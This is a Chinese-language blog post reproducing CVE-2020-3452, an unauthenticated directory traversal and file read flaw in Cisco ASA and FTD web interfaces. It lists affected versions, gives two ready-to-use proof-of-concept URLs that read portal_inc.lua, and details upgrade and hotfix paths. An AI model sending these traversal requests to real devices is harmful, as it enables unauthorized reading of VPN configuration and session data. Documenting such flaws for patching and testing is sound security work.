- A+
所属分类:漏洞复现
0x01 漏洞简述
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞(CVE-2020-3452),允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问,所以只能读取web系统目录的文件,比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址等信息。
0x02 影响版本
- Cisco ASA:<= 9.6
- Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14
- Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0
0x03 漏洞复现
poc1:
1 2 |
https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ |
poc2
1 |
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua |
0x04 修复建议
Cisco ASA:
- 9.6 版本以前升级到某一修复版本
- 9.6 版本升级到 9.6.4.42 版本
- 9.7 版本升级到某一修复版本
- 9.8 版本升级到 9.8.4.20 版本
- 9.9 版本升级到 9.9.2.74 版本
- 9.10 版本升级到 9.10.1.42 版本
- 9.12 版本升级到 9.12.3.12 版本
- 9.13 版本升级到 9.13.1.10 版本
- 9.14 版本升级到 9.14.1.10 版本
Cisco FTD:
- 6.2.2 版本升级到某一修复版本
- 6.2.3 版本升级到 6.2.3.16 版本
- 6.3.0 版本升级到 6.3.0.5(
Hot Fix
)/6.3.0.6/6.4.0.9(Hot Fix
)/6.6.0.1 版本 - 6.4.0 版本升级到 6.4.0.9(
Hot Fix
)/6.4.0.10 版本 - 6.5.0 版本升级到 6.5.0.4(
Hot Fix
)/6.5.0.5/6.6.0.1 版本 - 6.6.0 版本升级到 6.6.0.1 版本
Cisco FTD Hot Fix 细节:
-
6.3.0.5:
123Cisco_FTD_Hotfix_AV-6.3.0.6-3.sh.REL.tarCisco_FTD_SSP_Hotfix_AV-6.3.0.6-3.sh.REL.tarCisco_FTD_SSP_FP2K_Hotfix_AV-6.3.0.6-3.sh.REL.tar -
6.4.0.9:
1234Cisco_FTD_Hotfix_BM-6.4.0.10-2.sh.REL.tarCisco_FTD_SSP_FP1K_Hotfix_BM-6.4.0.10-2.sh.REL.tarCisco_FTD_SSP_FP2K_Hotfix_BM-6.4.0.10-2.sh.REL.tarCisco_FTD_SSP_Hotfix_BM-6.4.0.10-2.sh.REL.tar -
6.5.0.4:
1234Cisco_FTD_Hotfix_O-6.5.0.5-3.sh.REL.tarCisco_FTD_SSP_FP2K_Hotfix_O-6.5.0.5-3.sh.REL.tarCisco_FTD_SSP_FP1K_Hotfix_O-6.5.0.5-3.sh.REL.tarCisco_FTD_SSP_Hotfix_O-6.5.0.5-3.sh.REL.tar
要升级到Cisco FTD
的修复版本,客户可以执行以下操作之一:
- 对于使用
Cisco Firepower Management Center(FMC)
的设备,请使用FMC
界面安装升级。安装完成后,重新应用访问控制策略。 - 对于使用
Cisco Firepower Device Manager (FDM)
的设备,请使用FDM
界面来安装升级。安装完成后,重新应用访问控制策略。
- 我的微信
- 这是我的微信扫一扫
- 我的微信公众号
- 我的微信公众号扫一扫